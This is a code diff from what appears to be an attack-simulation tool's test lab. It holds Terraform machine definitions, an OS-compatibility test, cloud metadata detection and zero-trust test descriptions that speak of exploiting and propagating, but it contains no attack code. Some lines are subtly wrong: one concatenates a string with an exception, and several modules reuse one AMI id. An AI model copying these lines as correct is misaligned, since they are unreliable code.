user_data = "${local.user_data_linux_64}"
}
module "centos_8" {
source = "./instance_template"
name = "centos_8"
ami = "ami-0034c84e4e9c557bd"
ip = "10.0.0.38"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "suse_12" {
source = "./instance_template"
name = "suse_12"
ami = "ami-07b12b913a7e36b08"
ip = "10.0.0.42"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "suse_11" {
source = "./instance_template"
name = "suse_11"
ami = "ami-0083986c"
ip = "10.0.0.41"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "kali_2019" {
source = "./instance_template"
name = "kali_2019"
ami = "ami-05d64b1d0f967d4bf"
ip = "10.0.0.99"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
// Requires m3.medium which usually isn't available
//module "rhel_5" {
// source = "./instance_template"
// name = "rhel_5"
// ami = "ami-a48cbfb9"
// type = "m3.medium"
// ip = "10.0.0.85"
// env_vars = "${local.env_vars}"
// user_data = "${local.user_data_linux_64}"
//}
module "rhel_6" {
source = "./instance_template"
name = "rhel_6"
ami = "ami-0af3f0e0918f47bcf"
ip = "10.0.0.86"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "rhel_7" {
source = "./instance_template"
name = "rhel_7"
ami = "ami-0b5edb134b768706c"
ip = "10.0.0.87"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "rhel_8" {
source = "./instance_template"
name = "rhel_8"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.88"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_7" {
source = "./instance_template"
name = "debian_7"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.77"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_8" {
source = "./instance_template"
name = "debian_8"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.78"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_9" {
source = "./instance_template"
name = "debian_9"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.79"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "oracle_6" {
source = "./instance_template"
name = "oracle_6"
ami = "ami-0f9b69f34108a3770"
ip = "10.0.0.66"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "oracle_7" {
source = "./instance_template"
name = "oracle_7"
ami = "ami-001e494dc0f3372bc"
ip = "10.0.0.67"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "ubuntu_12" {
source = "./instance_template"
name = "ubuntu_12"
ami = "ami-003d0b1d"
ip = "10.0.0.22"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
// Requires m3.medium instance which usually isn't available
// module "ubuntu_12_32" {
// source = "./instance_template"
// name = "ubuntu_12_32"
// ami = "ami-06003c1b"
// ip = "10.0.0.23"
// env_vars = "${local.env_vars}"
// user_data = "${local.user_data_linux_32}"
// }
module "ubuntu_14" {
source = "./instance_template"
name = "ubuntu_14"
ami = "ami-067ee10914e74ffee"
ip = "10.0.0.24"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "ubuntu_19" {
source = "./instance_template"
name = "ubuntu_19"
ami = "ami-001b87954b72ea3ac"
ip = "10.0.0.29"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "windows_2003_r2_32" {
source = "./instance_template"
name = "windows_2003_r2_32"
ami = "ami-01e4fa6d"
ip = "10.0.0.4"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2003" {
source = "./instance_template"
name = "windows_2003"
ami = "ami-9e023183"
ip = "10.0.0.5"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2008_r2" {
source = "./instance_template"
name = "windows_2008_r2"
ami = "ami-05af5509c2c73e36e"
ip = "10.0.0.8"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2008_32" {
source = "./instance_template"
name = "windows_2008_32"
ami = "ami-3606352b"
ip = "10.0.0.6"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_32}"
}
module "windows_2012" {
source = "./instance_template"
name = "windows_2012"
ami = "ami-0d8c60e4d3ca36ed6"
ip = "10.0.0.12"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2012_r2" {
source = "./instance_template"
name = "windows_2012_r2"
ami = "ami-08dcceb529e70f875"
ip = "10.0.0.11"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2016" {
source = "./instance_template"
name = "windows_2016"
ami = "ami-02a6791b44938cfcd"
ip = "10.0.0.116"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2019" {
source = "./instance_template"
name = "windows_2019"
ami = "ami-09fe2745618d2af42"
ip = "10.0.0.119"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
@ -0,0 +1,62 @@
import pytest

from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient

machine_list = {
    "10.0.0.36": "centos_6",
    "10.0.0.37": "centos_7",
    "10.0.0.38": "centos_8",
    "10.0.0.42": "suse_12",
    "10.0.0.41": "suse_11",
    "10.0.0.99": "kali_2019",
    "10.0.0.86": "rhel_6",
    "10.0.0.87": "rhel_7",
    "10.0.0.88": "rhel_8",
    "10.0.0.77": "debian_7",
    "10.0.0.78": "debian_8",
    "10.0.0.79": "debian_9",
    "10.0.0.66": "oracle_6",
    "10.0.0.67": "oracle_7",
    "10.0.0.22": "ubuntu_12",
    "10.0.0.24": "ubuntu_14",
    "10.0.0.29": "ubuntu_19",
    "10.0.0.4": "windows_2003_r2_32",
    "10.0.0.5": "windows_2003",
    "10.0.0.8": "windows_2008",
    "10.0.0.6": "windows_2008_32",
    "10.0.0.12": "windows_2012",
    "10.0.0.11": "windows_2012_r2",
    "10.0.0.116": "windows_2016",
    "10.0.0.119": "windows_2019",
}


@pytest.fixture(scope='class')
def island_client(island):
    island_client_object = MonkeyIslandClient(island)
    yield island_client_object


@pytest.mark.usefixtures('island_client')
# noinspection PyUnresolvedReferences
class TestOSCompatibility(object):

    def test_os_compat(self, island_client):
        print()
        all_monkeys = island_client.get_all_monkeys_from_db()
        # Use a set so that two monkeys reporting the same IP don't
        # inflate the count and mask a machine that never reported.
        ips_that_communicated = set()
        for monkey in all_monkeys:
            for ip in monkey['ip_addresses']:
                if ip in machine_list:
                    ips_that_communicated.add(ip)
                    break
        for ip, os in machine_list.items():
            if ip not in ips_that_communicated:
                print("{} didn't communicate to island".format(os))

        assert len(ips_that_communicated) == len(machine_list), \
            "Not all machines communicated to the island"
monkey/codecov.yml (new file)
@ -0,0 +1,20 @@
codecov:
  require_ci_to_pass: yes

coverage:
  precision: 2
  round: down
  range: "50...90"

parsers:
  gcov:
    branch_detection:
      conditional: yes
      loop: yes
      method: no
      macro: no

comment:
  layout: "reach,diff,flags,tree"
  behavior: default
  require_changes: no
monkey/common/BUILD (new file)
@ -0,0 +1 @@
dev
@ -0,0 +1,12 @@
from typing import List

from common.cloud.aws.aws_instance import AwsInstance
from common.cloud.azure.azure_instance import AzureInstance
from common.cloud.gcp.gcp_instance import GcpInstance
from common.cloud.instance import CloudInstance

all_cloud_instances = [AwsInstance(), AzureInstance(), GcpInstance()]


def get_all_cloud_instances() -> List[CloudInstance]:
    return all_cloud_instances
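Each `CloudInstance` subclass answers `is_instance()` by probing its provider's metadata endpoint, so a caller can filter the list down to the environments the host actually runs in. A sketch with stand-in classes (the real subclasses probe metadata services; `detected_environments` is a hypothetical helper):

```python
from typing import List


class CloudInstance:
    # Stand-in for common.cloud.instance.CloudInstance.
    def is_instance(self) -> bool:
        return False


class FakeAwsInstance(CloudInstance):
    # Pretend the AWS metadata probe succeeded.
    def is_instance(self) -> bool:
        return True


def detected_environments(instances: List[CloudInstance]) -> List[CloudInstance]:
    # Keep only the providers whose metadata probe answered.
    return [i for i in instances if i.is_instance()]


print(len(detected_environments([FakeAwsInstance(), CloudInstance()])))  # 1
```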
@ -1,23 +1,30 @@
 import json
 import re
-import urllib2
+import urllib.request
+import urllib.error
 import logging

 __author__ = 'itay.mizeretz'

+from common.cloud.environment_names import Environment
+from common.cloud.instance import CloudInstance
+
 AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
 AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
 ACCOUNT_ID_KEY = "accountId"

 logger = logging.getLogger(__name__)

-class AwsInstance(object):
+class AwsInstance(CloudInstance):
     """
     Class which gives useful information about the current instance you're on.
     """

+    def is_instance(self):
+        return self.instance_id is not None
+
+    def get_cloud_provider_name(self) -> Environment:
+        return Environment.AWS
+
     def __init__(self):
         self.instance_id = None
@ -25,19 +32,20 @@ class AwsInstance(object):
         self.account_id = None

         try:
-            self.instance_id = urllib2.urlopen(
-                AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
+            self.instance_id = urllib.request.urlopen(
+                AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
             self.region = self._parse_region(
-                urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
-        except (urllib2.URLError, IOError) as e:
-            logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)
+                urllib.request.urlopen(
+                    AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
+        except (urllib.error.URLError, IOError) as e:
+            logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))

         try:
             self.account_id = self._extract_account_id(
-                urllib2.urlopen(
-                    AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
-        except (urllib2.URLError, IOError) as e:
-            logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))
+                urllib.request.urlopen(
+                    AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read().decode())
+        except (urllib.error.URLError, IOError) as e:
+            logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))

     @staticmethod
     def _parse_region(region_url_response):
@ -57,9 +65,6 @@ class AwsInstance(object):
     def get_region(self):
         return self.region

-    def is_aws_instance(self):
-        return self.instance_id is not None
-
     @staticmethod
     def _extract_account_id(instance_identity_document_response):
         """
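`_parse_region` (its body is outside this hunk) derives the region from the availability-zone string the metadata endpoint returns. One plausible implementation, assuming the usual `us-east-1a`-style format; this is a sketch, not the code from the commit:

```python
import re


def parse_region(availability_zone: str):
    # "us-east-1a" -> "us-east-1"; returns None when the string
    # doesn't look like a region followed by a zone letter.
    match = re.match(r"^(.+?-\d+)[a-z]$", availability_zone)
    return match.group(1) if match else None


print(parse_region("us-east-1a"))  # us-east-1
```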
@ -4,7 +4,7 @@ import boto3
 import botocore
 from botocore.exceptions import ClientError

-from common.cloud.aws_instance import AwsInstance
+from common.cloud.aws.aws_instance import AwsInstance

 __author__ = ['itay.mizeretz', 'shay.nehmad']
@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName'
 PLATFORM_TYPE_KEY = 'PlatformType'
 IP_ADDRESS_KEY = 'IPAddress'

 logger = logging.getLogger(__name__)
@ -84,5 +83,5 @@ class AwsService(object):
             filtered_instances_data = filter_instance_data_from_aws_response(response)
             return filtered_instances_data
         except botocore.exceptions.ClientError as e:
-            logger.warning("AWS client error while trying to get instances: " + e.message)
+            logger.warning("AWS client error while trying to get instances: " + e)
             raise e


@@ -1,9 +1,8 @@
 from unittest import TestCase

-from aws_service import filter_instance_data_from_aws_response
+from .aws_service import filter_instance_data_from_aws_response

 import json

 __author__ = 'shay.nehmad'

@@ -11,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
     def test_filter_instance_data_from_aws_response(self):
         json_response_full = """
         {
            "InstanceInformationList": [
               {
                  "ActivationId": "string",
                  "AgentVersion": "string",
                  "AssociationOverview": {
                     "DetailedStatus": "string",
                     "InstanceAssociationStatusAggregatedCount": {
                        "string" : 6
                     }
                  },
                  "AssociationStatus": "string",

@@ -53,7 +52,7 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
         self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
         self.assertEqual(
             filter_instance_data_from_aws_response(json.loads(json_response_full)),
-            [{'instance_id': u'string',
-              'ip_address': u'string',
-              'name': u'string',
-              'os': u'string'}])
+            [{'instance_id': 'string',
+              'ip_address': 'string',
+              'name': 'string',
+              'os': 'string'}])


@@ -0,0 +1,55 @@
+import logging
+
+import requests
+
+from common.cloud.environment_names import Environment
+from common.cloud.instance import CloudInstance
+
+LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
+AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
+
+logger = logging.getLogger(__name__)
+
+
+class AzureInstance(CloudInstance):
+    """
+    Access to useful information about the current machine if it's an Azure VM.
+    Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
+    """
+    def is_instance(self):
+        return self.on_azure
+
+    def get_cloud_provider_name(self) -> Environment:
+        return Environment.AZURE
+
+    def __init__(self):
+        """
+        Determines if on Azure and if so, gets some basic metadata on this instance.
+        """
+        self.instance_name = None
+        self.instance_id = None
+        self.location = None
+        self.on_azure = False
+
+        try:
+            response = requests.get(AZURE_METADATA_SERVICE_URL, headers={"Metadata": "true"})
+            self.on_azure = True
+
+            # If not on cloud, the metadata URL is non-routable and the connection will fail.
+            # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
+            if response:
+                logger.debug("On Azure. Trying to parse metadata.")
+                self.try_parse_response(response)
+            else:
+                logger.warning("On Azure, but metadata response not ok: {}".format(response.status_code))
+        except requests.RequestException:
+            logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
+            self.on_azure = False
+
+    def try_parse_response(self, response):
+        try:
+            response_data = response.json()
+            self.instance_name = response_data["compute"]["name"]
+            self.instance_id = response_data["compute"]["vmId"]
+            self.location = response_data["compute"]["location"]
+        except KeyError:
+            logger.exception("Error while parsing response from Azure metadata service.")
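`try_parse_response` boils down to pulling three fields out of the IMDS `compute` document. A standalone sketch of just that parsing step (field names per the Azure docs; the sample payload below is invented for illustration):

```python
def parse_compute_metadata(response_data):
    """Extract (name, vmId, location) from an Azure IMDS response dict.

    Returns (None, None, None) when the expected keys are absent,
    mirroring the KeyError handling in try_parse_response above.
    """
    try:
        compute = response_data["compute"]
        return compute["name"], compute["vmId"], compute["location"]
    except KeyError:
        return None, None, None


# Invented sample shaped like an IMDS answer
sample = {"compute": {"name": "demo-vm", "vmId": "0000-1111", "location": "westeurope"}}
print(parse_compute_metadata(sample))  # ('demo-vm', '0000-1111', 'westeurope')
print(parse_compute_metadata({}))      # (None, None, None)
```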


@@ -0,0 +1,15 @@
+from enum import Enum
+
+
+class Environment(Enum):
+    UNKNOWN = "Unknown"
+    ON_PREMISE = "On Premise"
+    AZURE = "Azure"
+    AWS = "AWS"
+    GCP = "GCP"
+    ALIBABA = "Alibaba Cloud"
+    IBM = "IBM Cloud"
+    DigitalOcean = "Digital Ocean"
+
+
+ALL_ENVIRONMENTS_NAMES = [x.value for x in Environment]
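The `ALL_ENVIRONMENTS_NAMES` line relies on the fact that iterating an `Enum` class yields its members in definition order. A quick sketch with a trimmed-down version of the enum:

```python
from enum import Enum


class Environment(Enum):
    UNKNOWN = "Unknown"
    AZURE = "Azure"
    AWS = "AWS"


# Iterating the class yields members in definition order; .value recovers the strings
names = [member.value for member in Environment]
print(names)  # ['Unknown', 'Azure', 'AWS']

# Lookup by value also works, which is handy when deserializing stored reports
print(Environment("AWS"))  # Environment.AWS
```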


@@ -0,0 +1,43 @@
+import logging
+
+import requests
+
+from common.cloud.environment_names import Environment
+from common.cloud.instance import CloudInstance
+
+logger = logging.getLogger(__name__)
+
+GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
+
+
+class GcpInstance(CloudInstance):
+    """
+    Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
+    """
+    def is_instance(self):
+        return self.on_gcp
+
+    def get_cloud_provider_name(self) -> Environment:
+        return Environment.GCP
+
+    def __init__(self):
+        self.on_gcp = False
+
+        try:
+            # If not on GCP, this domain shouldn't resolve.
+            response = requests.get(GCP_METADATA_SERVICE_URL)
+
+            if response:
+                logger.debug("Got ok metadata response: on GCP")
+                self.on_gcp = True
+
+                if "Metadata-Flavor" not in response.headers:
+                    logger.warning("Got unexpected GCP Metadata format")
+                else:
+                    if not response.headers["Metadata-Flavor"] == "Google":
+                        logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"]))
+            else:
+                logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
+        except requests.RequestException:
+            logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
+            self.on_gcp = False
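The header check above can be isolated: GCP's metadata server stamps every response with `Metadata-Flavor: Google`, so the verification is just a dict lookup. A minimal sketch:

```python
def is_gcp_metadata_response(headers):
    """True only if the response carries GCP's "Metadata-Flavor: Google" marker."""
    return headers.get("Metadata-Flavor") == "Google"


print(is_gcp_metadata_response({"Metadata-Flavor": "Google"}))  # True
print(is_gcp_metadata_response({"Server": "nginx"}))            # False
```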


@@ -0,0 +1,14 @@
+from common.cloud.environment_names import Environment
+
+
+class CloudInstance(object):
+    """
+    This is an abstract class which represents a cloud instance.
+
+    The current machine can be a cloud instance (for example EC2 instance or Azure VM).
+    """
+    def is_instance(self) -> bool:
+        raise NotImplementedError()
+
+    def get_cloud_provider_name(self) -> Environment:
+        raise NotImplementedError()
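A concrete provider only has to fill in these two methods. A toy subclass (hypothetical, for illustration; a real one like `GcpInstance` probes the metadata service in `__init__`):

```python
from enum import Enum


class Environment(Enum):
    UNKNOWN = "Unknown"
    GCP = "GCP"


class CloudInstance:
    """Abstract base: each cloud provider answers two questions."""
    def is_instance(self) -> bool:
        raise NotImplementedError()

    def get_cloud_provider_name(self) -> Environment:
        raise NotImplementedError()


class FakeGcpInstance(CloudInstance):
    # Hypothetical subclass: detection result is injected instead of probed
    def __init__(self, on_gcp):
        self.on_gcp = on_gcp

    def is_instance(self) -> bool:
        return self.on_gcp

    def get_cloud_provider_name(self) -> Environment:
        return Environment.GCP


print(FakeGcpInstance(True).is_instance())              # True
print(FakeGcpInstance(True).get_cloud_provider_name())  # Environment.GCP
```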


@@ -1,6 +1,5 @@
 from common.cmd.cmd_result import CmdResult

 __author__ = 'itay.mizeretz'

@@ -11,8 +10,8 @@ class AwsCmdResult(CmdResult):
     def __init__(self, command_info):
         super(AwsCmdResult, self).__init__(
-            self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
-            command_info[u'StandardErrorContent'])
+            self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
+            command_info['StandardErrorContent'])
         self.command_info = command_info

     @staticmethod

@@ -23,4 +22,4 @@ class AwsCmdResult(CmdResult):
         :param is_timeout: Whether the given command timed out
         :return: True if successful, False otherwise.
         """
-        return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))
+        return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))


@@ -1,6 +1,6 @@
 import logging

-from common.cloud.aws_service import AwsService
+from common.cloud.aws.aws_service import AwsService
 from common.cmd.aws.aws_cmd_result import AwsCmdResult
 from common.cmd.cmd_runner import CmdRunner
 from common.cmd.cmd_status import CmdStatus

@@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
     Class for running commands on a remote AWS machine
     """

-    def __init__(self, is_linux, instance_id, region = None):
+    def __init__(self, is_linux, instance_id, region=None):
         super(AwsCmdRunner, self).__init__(is_linux)
         self.instance_id = instance_id
         self.region = region

@@ -28,9 +28,9 @@ class AwsCmdRunner(CmdRunner):
         return AwsCmdResult(command_info)

     def get_command_status(self, command_info):
-        if command_info[u'Status'] == u'InProgress':
+        if command_info['Status'] == 'InProgress':
             return CmdStatus.IN_PROGRESS
-        elif command_info[u'Status'] == u'Success':
+        elif command_info['Status'] == 'Success':
             return CmdStatus.SUCCESS
         else:
             return CmdStatus.FAILURE


@@ -61,7 +61,7 @@ class CmdRunner(object):
             command_instance_dict[command] = instance

         instance_results = {}
-        command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
+        command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
         for command, result in command_result_pairs:
             instance = command_instance_dict[command]
             instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)


@@ -1,2 +1,3 @@
-from zero_trust_consts import populate_mappings
+from .zero_trust_consts import populate_mappings

 populate_mappings()


@@ -1,2 +1 @@
 ES_SERVICE = 'elastic-search-9200'


@@ -0,0 +1,4 @@
+AWS_COLLECTOR = "AwsCollector"
+HOSTNAME_COLLECTOR = "HostnameCollector"
+ENVIRONMENT_COLLECTOR = "EnvironmentCollector"
+PROCESS_LIST_COLLECTOR = "ProcessListCollector"


@@ -6,31 +6,31 @@ This file contains static mappings between zero trust components such as: pillar
 Some of the mappings are computed when this module is loaded.
 """

-AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
-VISIBILITY_ANALYTICS = u"Visibility & Analytics"
-WORKLOADS = u"Workloads"
-DEVICES = u"Devices"
-NETWORKS = u"Networks"
-PEOPLE = u"People"
-DATA = u"Data"
+AUTOMATION_ORCHESTRATION = "Automation & Orchestration"
+VISIBILITY_ANALYTICS = "Visibility & Analytics"
+WORKLOADS = "Workloads"
+DEVICES = "Devices"
+NETWORKS = "Networks"
+PEOPLE = "People"
+DATA = "Data"
 PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)

-STATUS_UNEXECUTED = u"Unexecuted"
-STATUS_PASSED = u"Passed"
-STATUS_VERIFY = u"Verify"
-STATUS_FAILED = u"Failed"
+STATUS_UNEXECUTED = "Unexecuted"
+STATUS_PASSED = "Passed"
+STATUS_VERIFY = "Verify"
+STATUS_FAILED = "Failed"
 # Don't change order! The statuses are ordered by importance/severity.
 ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]

-TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
-TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
-TEST_MACHINE_EXPLOITED = u"machine_exploited"
-TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
-TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
-TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
-TEST_SEGMENTATION = u"segmentation"
-TEST_TUNNELING = u"tunneling"
-TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
+TEST_DATA_ENDPOINT_ELASTIC = "unencrypted_data_endpoint_elastic"
+TEST_DATA_ENDPOINT_HTTP = "unencrypted_data_endpoint_http"
+TEST_MACHINE_EXPLOITED = "machine_exploited"
+TEST_ENDPOINT_SECURITY_EXISTS = "endpoint_security_exists"
+TEST_SCHEDULED_EXECUTION = "scheduled_execution"
+TEST_MALICIOUS_ACTIVITY_TIMELINE = "malicious_activity_timeline"
+TEST_SEGMENTATION = "segmentation"
+TEST_TUNNELING = "tunneling"
+TEST_COMMUNICATE_AS_NEW_USER = "communicate_as_new_user"
 TESTS = (
     TEST_SEGMENTATION,
     TEST_MALICIOUS_ACTIVITY_TIMELINE,
@@ -43,32 +43,33 @@ TESTS = (
     TEST_COMMUNICATE_AS_NEW_USER
 )

-PRINCIPLE_DATA_TRANSIT = u"data_transit"
-PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
-PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
-PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
-PRINCIPLE_SEGMENTATION = u"segmentation"
-PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
-PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
+PRINCIPLE_DATA_TRANSIT = "data_transit"
+PRINCIPLE_ENDPOINT_SECURITY = "endpoint_security"
+PRINCIPLE_USER_BEHAVIOUR = "user_behaviour"
+PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = "analyze_network_traffic"
+PRINCIPLE_SEGMENTATION = "segmentation"
+PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = "network_policies"
+PRINCIPLE_USERS_MAC_POLICIES = "users_mac_policies"
 PRINCIPLES = {
-    PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
-    PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
-    PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
-    PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
-    PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
-    PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
-    PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
-                                  u"Access Control) only.",
+    PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
+    PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
+    PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
+    PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
+    PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.",
+    PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
+    PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory "
+                                  "Access Control) only.",
 }

-POSSIBLE_STATUSES_KEY = u"possible_statuses"
-PILLARS_KEY = u"pillars"
-PRINCIPLE_KEY = u"principle_key"
-FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
-TEST_EXPLANATION_KEY = u"explanation"
+POSSIBLE_STATUSES_KEY = "possible_statuses"
+PILLARS_KEY = "pillars"
+PRINCIPLE_KEY = "principle_key"
+FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
+TEST_EXPLANATION_KEY = "explanation"
 TESTS_MAP = {
     TEST_SEGMENTATION: {
-        TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
+        TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
+                              "running on, that belong to different network segments.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
             STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."

@@ -78,7 +79,8 @@ TESTS_MAP = {
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
     },
     TEST_MALICIOUS_ACTIVITY_TIMELINE: {
-        TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
+        TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
+                              "exploitation.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
         },

@@ -87,19 +89,22 @@ TESTS_MAP = {
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
     },
     TEST_ENDPOINT_SECURITY_EXISTS: {
-        TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
+        TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
-            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
+            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
+                           "software on endpoints.",
+            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
+                           "security concern. "
         },
         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
         PILLARS_KEY: [DEVICES],
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
     },
     TEST_MACHINE_EXPLOITED: {
-        TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
+        TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
+            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
+                           "which endpoints were compromised.",
             STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
         },
